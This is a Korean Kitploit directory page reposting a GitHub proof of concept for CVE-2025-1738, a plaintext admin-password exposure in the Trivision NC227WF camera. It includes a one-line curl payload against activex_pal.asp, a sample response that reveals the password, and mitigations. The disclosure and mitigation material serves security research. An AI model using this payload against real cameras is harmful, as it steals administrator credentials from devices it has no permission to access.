Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-1738 — 0day 발견 CVE-2025-1738 | Kitploit
도구/GitHubGitHub/n0n4m3x41/cve-2025-1738
IoT SecurityPassword AttacksVulnerability AnalysisExploitationHardware & IoT SecurityLearning & Education
GitHubn0n4m3x41/cve-2025-1738

CVE-2025-1738

0day 발견 CVE-2025-1738

저장소 보기
35개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-1738 - Trivision 카메라 NC227WF PoC

📋 개요

책임 있는 공개 절차에 따라 두 개의 공식 CVE가 할당되었습니다.

CVECVSS v3.1점수CWE유형
CVE-2025-1738AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N6.2CWE-598평문 비밀번호 노출

🔍 CVE-2025-1738 — 평문 비밀번호 노출 (CWE-598)

설명

모든 로컬 사용자는 사전 인증 없이 관리자 비밀번호를 평문으로 가져올 수 있습니다.

  • 공격 벡터: 로컬 (AV:L)
  • CVSS 점수: 6.2
  • CWE: CWE-598 (민감한 쿼리 문자열과 함께 GET 요청 메서드 사용)

페이로드

root@kitploit:~
curl -u admin:whatever http://<CAMERA_IP>:<PORT> --request-target en/player/activex_pal.asp

응답 예시

이미지
root@kitploit:~
...password=unguessable123!...

관리자 비밀번호는 응답 본문 내에서 평문으로 반환됩니다.


🛡️ 완화 조치

  • 펌웨어 업그레이드: Trivision에서 패치된 버전을 사용할 수 있는 경우.
  • 카메라 격리: 외부 접근이 없는 전용 VLAN에 카메라를 격리하십시오.
  • 방화벽 설정: 신뢰할 수 없는 네트워크 세그먼트로부터 카메라의 관리 포트를 방화벽으로 차단하십시오.
  • 기본 자격 증명 변경 및 정기적인 비밀번호 교체.
  • activex_pal.asp 및 mblogin.asp에 대한 예기치 않은 접근을 모니터링하십시오.

📚 참고 자료

  • NVD — CVE-2025-1738
  • NVD — CVE-2025-1739

⚖️ 면책 조항

이 저장소는 교육 및 공인된 보안 연구 목적으로만 제공됩니다. 작성자는 어떠한 오용에 대해서도 책임을 지지 않습니다. 항상 기기를 테스트하기 전에 명시적 허가를 받으십시오.

도구 다운로드